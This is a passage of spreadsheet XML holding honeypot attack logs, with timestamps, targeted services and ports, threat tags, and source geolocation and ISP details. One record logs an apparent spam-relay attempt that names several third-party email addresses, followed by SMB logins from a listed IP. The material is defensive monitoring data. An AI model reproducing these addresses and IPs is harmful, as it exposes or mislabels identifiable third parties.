    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SMB_H43&amp;&amp;SMA-LAB_MT-CPA_H5&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="445&amp;&amp;5713&amp;&amp;3306&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="None&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ef1:6c38"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1866"/>
    <x v="1866"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T10:17:13"/>
    <d v="2025-03-01T19:54:59"/>
    <d v="2025-04-14T10:17:13"/>
    <n v="11374"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H34"/>
    <s v="3306&amp;&amp;5432"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="HoneyPot BlackListed IP"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="HE"/>
    <s v="Hesse"/>
    <s v="Regierungsbezirk Darmstadt"/>
    <s v="Frankfurt am Main"/>
    <s v="2925533"/>
    <s v="60313"/>
    <s v="50.1109"/>
    <s v="8.68213"/>
    <s v="215730"/>
    <s v="H2NEXUS LTD"/>
    <s v="H2nexus LTD"/>
    <s v="hosting"/>
    <s v="H2nexus LTD"/>
    <s v="2009-08-27"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_POSTGRES:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6d78:8996"/>
    <s v="C-I"/>
    <s v="medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1867"/>
    <x v="1867"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T10:14:52"/>
    <d v="2025-04-14T05:08:18"/>
    <d v="2025-04-14T10:14:52"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d03:2de2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1868"/>
    <x v="1868"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T10:14:19"/>
    <d v="2025-04-14T10:14:19"/>
    <d v="2025-04-14T10:14:19"/>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f1:dacf"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1869"/>
    <x v="1869"/>
    <s v="NA&amp;&amp;109.231.20.68.koba.pl"/>
    <x v="0"/>
    <d v="2025-04-14T10:11:33"/>
    <d v="2025-03-26T16:38:11"/>
    <d v="2025-04-14T10:11:33"/>
    <n v="33"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="PL"/>
    <s v="Poland"/>
    <s v="20"/>
    <s v="Podlasie"/>
    <s v="Białystok"/>
    <s v="Bialystok"/>
    <s v="776069"/>
    <s v="NA"/>
    <s v="53.1333"/>
    <s v="23.1643"/>
    <s v="34525"/>
    <s v="KOBA Sp. z o.o."/>
    <s v="KOBA Sp. z o.o"/>
    <s v="business"/>
    <s v="KoBa Internet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6de7:1444"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1870"/>
    <x v="1870"/>
    <s v="221-120-34-108.emome-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T10:10:36"/>
    <d v="2025-03-15T16:40:27"/>
    <d v="2025-04-14T10:10:36"/>
    <n v="24"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.033"/>
    <s v="121.565"/>
    <s v="17421"/>
    <s v="Mobile Business Group"/>
    <s v="EMOME"/>
    <s v="cellular"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dd78:226c"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1871"/>
    <x v="1871"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T09:47:25"/>
    <d v="2025-04-14T09:47:25"/>
    <d v="2025-04-14T09:47:25"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Kolkata"/>
    <s v="Kolkata"/>
    <s v="1275004"/>
    <s v="NA"/>
    <s v="22.5626"/>
    <s v="88.363"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7448:80e1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1872"/>
    <x v="1872"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T09:37:27"/>
    <d v="2025-04-14T08:29:30"/>
    <d v="2025-04-14T09:37:27"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="CH"/>
    <s v="Switzerland"/>
    <s v="ZH"/>
    <s v="Zurich"/>
    <s v="Bezirk Dietikon"/>
    <s v="Schlieren"/>
    <s v="2658724"/>
    <s v="8952"/>
    <s v="47.3967"/>
    <s v="8.44763"/>
    <s v="9009"/>
    <s v="M247 Europe SRL"/>
    <s v="M247 Europe SRL"/>
    <s v="hosting"/>
    <s v="M247 Ltd Zurich"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9246:860e"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1873"/>
    <x v="1873"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T09:35:50"/>
    <d v="2025-04-14T09:35:50"/>
    <d v="2025-04-14T09:35:50"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Surat"/>
    <s v="Surat"/>
    <s v="1255364"/>
    <s v="NA"/>
    <s v="21.1959"/>
    <s v="72.8302"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Broadband Project2.2"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5f:b53b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1874"/>
    <x v="1874"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T09:35:27"/>
    <d v="2025-04-14T07:34:13"/>
    <d v="2025-04-14T09:35:27"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JB"/>
    <s v="West Java"/>
    <s v="Kota Bandung"/>
    <s v="Bandung"/>
    <s v="1650357"/>
    <s v="NA"/>
    <s v="-6.92222"/>
    <s v="107.607"/>
    <s v="55699"/>
    <s v="PT. Cemerlang Multimedia"/>
    <s v="PT. Cemerlang Multimedia"/>
    <s v="business"/>
    <s v="PT Aksara Perdana Multimedia"/>
    <s v="2019-12-23"/>
    <s v="IDNIC-APM-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6793:895"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1875"/>
    <x v="1875"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T09:33:48"/>
    <d v="2025-04-14T09:33:48"/>
    <d v="2025-04-14T09:33:48"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="KIXS-AS-KR"/>
    <s v="Korea Telecom"/>
    <s v="corporate"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:762c:ce5c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1876"/>
    <x v="1876"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T09:13:38"/>
    <d v="2025-04-12T21:16:10"/>
    <d v="2025-04-14T09:13:38"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1"/>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NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c3:d087"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1877"/>
    <x v="1877"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T09:13:25"/>
    <d v="2025-02-22T01:17:58"/>
    <d v="2025-04-14T09:13:25"/>
    <n v="4252"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H13"/>
    <s v="25&amp;&amp;NA&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="LI"/>
    <s v="Limburg"/>
    <s v="Kerkrade Municipality"/>
    <s v="Eygelshoven"/>
    <s v="2756285"/>
    <s v="6471"/>
    <s v="50.8956"/>
    <s v="6.06924"/>
    <s v="214940"/>
    <s v="KPROHOST LLC"/>
    <s v="Kprohost LLC"/>
    <s v="hosting"/>
    <s v="Pitline Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;test@paradisefm.cw&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;riamtransfer@aol.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;alejandrromayorkas@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;moneygram1184@yahoo.com.hk&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;ekeneugboaja3@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;walmartcenter001@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;NA&amp;&amp;{Data_SMB:Incoming connection (195.211.191.186,56365)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPBianca,WIN-4TTI4DH7SGH)}&amp;&amp;{Data_SMB:Incoming connection (195.211.191.186,62070)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPBianca,WIN-4TTI4DH7SGH)}&amp;&amp;{Data_SMB:Incoming connection (195.211.191.186,65307)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPBianca,WIN-4TTI4DH7SGH)}&amp;&amp;{Data_SMB:Incoming connection (195.211.191.186,51133)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (WORKGROUPBianca,WIN-4TTI4DH7SGH)}&amp;&amp;{Data_SMB:Incoming connection (195.211.191.186,54365)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c3d3:bfba"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1878"/>
    <x v="1878"/>
    <s v="node-1dnp.pool-101-51.dynamic.nt-isp.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-14T09:11:14"/>
    <d v="2025-04-14T09:08:50"/>
    <d v="2025-04-14T09:11:14"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TH"/>
    <s v="Thailand"/>
    <s v="10"/>
    <s v="Bangkok"/>
    <s v="Lak Si"/>
    <s v="Khwaeng Thung Song Hong"/>
    <s v="1613187"/>
    <s v="NA"/>
    <s v="13.8983"/>
    <s v="100.582"/>
    <s v="23969"/>
    <s v="TOT Public Company Limited"/>
    <s v="TOT Public Company Limited"/>
    <s v="business"/>
    <s v="TOT Public Company Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6533:fb65"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1879"/>
    <x v="1879"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T09:07:52"/>
    <d v="2025-04-14T09:07:52"/>
    <d v="2025-04-14T09:07:52"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="KKC"/>
    <s v="Kowloon City"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="1819609"/>
    <s v="NA"/>
    <s v="22.3144"/>
    <s v="114.22"/>
    <s v="17924"/>
    <s v="SMARTONE-MB-AS-AP"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="consumer"/>
    <s v="Smartone Mobile communications Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3183:15f2"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1880"/>
    <x v="1880"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T09:03:03"/>
    <d v="2025-04-14T09:03:03"/>
    <d v="2025-04-14T09:03:03"/>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2:b692"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1881"/>
    <x v="1881"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T08:59:56"/>
    <d v="2025-04-14T08:59:56"/>
    <d v="2025-04-14T08:59:56"/>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3b5c:a49f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1882"/>
    <x v="1882"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T08:59:19"/>
    <d v="2025-04-14T08:57:48"/>
    <d v="2025-04-14T08:59:19"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2008-11-04"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:71a5:dad7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1883"/>
    <x v="1883"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-14T08:52:50"/>
    <d v="2025-04-14T08:52:50"/>
    <d v="2025-04-14T08:52:50"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>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dd:7755"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1884"/>
    <x v="1884"/>
    <s v="c-75-70-143-111.hsd1.co.comcast.net"/>
    <x v="0"/>
